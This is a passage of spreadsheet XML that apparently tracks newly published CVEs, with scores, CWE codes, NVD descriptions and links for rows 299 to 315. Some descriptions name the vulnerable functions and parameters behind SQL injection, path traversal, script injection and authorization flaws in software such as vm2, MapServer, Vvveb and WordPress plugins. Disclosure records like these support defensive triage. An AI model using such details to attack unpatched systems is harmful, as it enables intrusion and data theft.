          <t>CWE-200</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox for running untrusted Node.js code. In versions &lt;= 3.11.7, NodeVM exposes the host `util` module to the sandbox as an unfiltered shallow copy (`Object.assign({}, util)` in `defaultBuiltinLoaderUtil`), and the deprecated `sys` builtin (an alias of host `util`) is exposed through the generic builtin loader. On Node.js &gt;= 22.9 this hands sandboxed code `util.getCallSites()`, a programmatic stack-introspection API that returns the host process's full call stack, including absolute file paths, function names, and line numbers for vm2 bridge internals and the embedding application's entrypoint. This bypasses the host-frame redaction introduced for GHSA-v27g-jcqj-v8rw, which only applies to the `Error.prepareStackTrace` formatting channel. The issue is fixed in vm2 3.11.8.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92933</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44940</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-312</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>The rancher-extension-stackstate extension in SUSE Observability exposes service tokens in plain configuration or insecure locations rather than managing them securely. An attacker with minimal access could obtain the token to gain unauthorized access or escalate privileges within the observability environment.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44940</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92758</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>If logging mode is set to DEBUG or a malformed MongoDB connection string is used, application logs may collect sensitive information (if in use) such as passwords and AWS secure access keys.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92758</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50291</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>OpenImageIO is a toolset for reading, writing, and manipulating image files of any image file format relevant to VFX / animation. Prior to versions 3.0.16.0 and 3.1.11.0, processing a crafted BMP file through oiiotool or an application linked to OpenImageIO can reach BMP palette handling in src/bmp.imageio/bmpinput.cpp with an empty color table. BmpInput::read_native_scanline then performs an invalid palette read while decoding an RLE-compressed scanline, causing a process crash and denial of service. This issue is fixed in versions 3.0.16.0 and 3.1.11.0.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50291</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76781</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libxml2. A local user or an attacker providing a specially crafted XML catalog can trigger a NULL pointer dereference during XML catalog parsing. This occurs when a `nextCatalog` element lacks its mandatory `catalog` attribute, leading to the application crashing and causing a Denial of Service (DoS).</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76781</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92926</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in code-projects Matrimonial System 1.0. This vulnerability affects the function writepartnerprefs of the file /partner_preference.php. Such manipulation of the argument education leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92926</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14311</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing ownership verification on /users/customers/&lt;id&gt; endpoint  in all versions up to, and including, 2.4.4. This makes it possible for authenticated attackers, with wpamelia-provider role, to view and modify arbitrary customers, including password reset. Takeover of WordPress user accounts, with the roles up to Editor, is also possible if that user had made an Amelia booking. This vulnerability affects only the Premium version of the plugin, where the Employee Panel is present.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14311</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54613</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.5, getThemeFolder() in admin/controller/editor/revisions.php returns the attacker-controlled theme parameter without sanitization, and backupFolder() concatenates it beneath DIR_THEMES before editor/revisions/load or editor/revisions/delete operates on a named .html file. sanitizeBackupFileName() strips traversal characters only from the separate file parameter and does not protect the theme directory component. An authenticated user with the default Editor role and editor/* permission can submit traversal sequences that redirect file_get_contents() or unlink() to a reachable backup subdirectory outside the web root. A valid admin session and CSRF token are required, the read is limited to .html files in backup directories, and deletion additionally requires filesystem write permission. This can disclose sensitive exported site content or remove backup data. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54613</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54643</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, the delete-note handler in admin/sources/orders.index.inc.php verifies only the presence of order_id and delete-note parameters before deleting records from CubeCart_order_notes, without requiring CC_PERM_DELETE for orders. An authenticated administrator lacking order modification privileges can directly invoke the handler with valid identifiers and delete order-history notes, removing operational records and audit-trail data. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54643</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73999</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Cooked &lt;= 1.16.0 versions.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73999</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74005</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in PublishPress Series &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74005</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80355</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Cross-Site Request Forgery (CSRF) vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80355</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16582</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to unauthorized modification of data in all versions up to, and including, 2.4.5. This is due to the plugin accepting a client-supplied package-redemption identifier as proof of payment without validating it. This makes it possible for unauthenticated attackers to create approved appointment bookings without completing payment</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16582</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16750</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>The Motors – Car Dealership &amp; Classified Listings Plugin plugin for WordPress is vulnerable to unauthorized access of data due to missing authorization checks in mvl_ajax_dealer_load_cars() function in all versions up to, and including, 1.4.120. This makes it possible for unauthenticated attackers to retrieve draft, pending, private, and future car listings belonging to arbitrary users.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16750</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54355</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>MapServer is a system for developing web-based GIS applications. From 6.0 until 8.6.4, MapServer's OpenLayers HTML output for SERVICE=WMS&amp;REQUEST=GetMap&amp;FORMAT=application/openlayers reflects an attacker-controlled X-Forwarded-Host value received as HTTP_X_FORWARDED_HOST through msBuildOnlineResource(), processLine(), and the [mapserv_onlineresource] substitution in src/maputil.c and src/maptemplate.c without escaping it for a single-quoted JavaScript string. When the deployment trusts the forwarded header and does not configure a fixed ows_onlineresource or MS_ONLINERESOURCE value, embedded single quotes can escape the generated URL string. An unauthenticated attacker can craft a URL that executes arbitrary JavaScript in the MapServer site origin when opened by a victim, enabling access to sessions or tokens, same-origin data and requests, and actions as the victim. This issue is fixed in version 8.6.4.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54355</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54594</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-799</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>OmniBlocks is a monorepo for the OmniBlocks project. Prior to the June 6, 2026 workflow remediation, .github/workflows/disc.yml runs for the issues opened event and the issues edited event and invokes the createDiscussion mutation whenever an issue is classified as off-topic, without recording that the issue was already converted or otherwise suppressing duplicate runs. A user who creates one off-topic issue and repeatedly edits its description before conversion completes can therefore cause multiple discussions to be created for the same issue, producing discussion spam and additional moderation work. This issue is fixed with commit 627e0f0a16a7d74b09128106b57dd7e85d2545df.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54594</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54604</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>5.3</v>
      </c>
